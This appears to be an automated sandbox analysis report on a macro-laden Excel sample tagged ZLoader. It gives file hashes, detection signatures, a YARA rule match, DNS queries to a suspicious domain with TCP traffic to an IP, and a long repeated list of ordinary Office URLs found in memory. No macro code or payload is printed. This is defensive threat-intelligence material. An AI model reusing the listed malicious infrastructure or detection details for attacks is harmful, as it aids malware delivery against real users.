Loading ...

Play interactive tourEdit tour

Analysis Report doc2227740.xls

Overview

General Information

Sample Name:doc2227740.xls
Analysis ID:320290
MD5:b43d8b40f9ef15965d0ff901e30c2f32
SHA1:3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572
SHA256:196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda
Tags:xlsZLoader

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4092 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • MSOSYNC.EXE (PID: 2916 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
doc2227740.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0xbf4b:$s1: Excel
  • 0xfc43:$s1: Excel
  • 0x10187:$s1: Excel
  • 0x11376:$s1: Excel
  • 0x1574d:$s1: Excel
  • 0x157aa:$s1: Excel
  • 0x157cd:$s1: Excel
  • 0x38c6:$Auto_Close: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3A
doc2227740.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: doc2227740.xlsReversingLabs: Detection: 20%
    Source: doc2227740.xlsReversingLabs: Detection: 20%
    Source: global trafficDNS query: name: sherpa.rest
    Source: global trafficDNS query: name: sherpa.rest
    Source: global trafficTCP traffic: 192.168.2.7:49719 -> 104.27.172.15:443
    Source: global trafficTCP traffic: 192.168.2.7:49719 -> 104.27.172.15:443
    Source: global trafficTCP traffic: 192.168.2.7:49719 -> 104.27.172.15:443
    Source: global trafficTCP traffic: 192.168.2.7:49719 -> 104.27.172.15:443
    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: sherpa.rest
    Source: unknownDNS traffic detected: queries for: sherpa.rest
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.office.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.onedrive.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://augloop.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.entity.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cortana.ai
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cr.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://directory.services.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.windows.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.windows.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.local
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://messaging.office.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeapps.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift-user.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://settings.outlook.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://tasks.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.office.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.onedrive.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://augloop.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.entity.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cortana.ai
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://cr.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://directory.services.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.ppe.windows.net
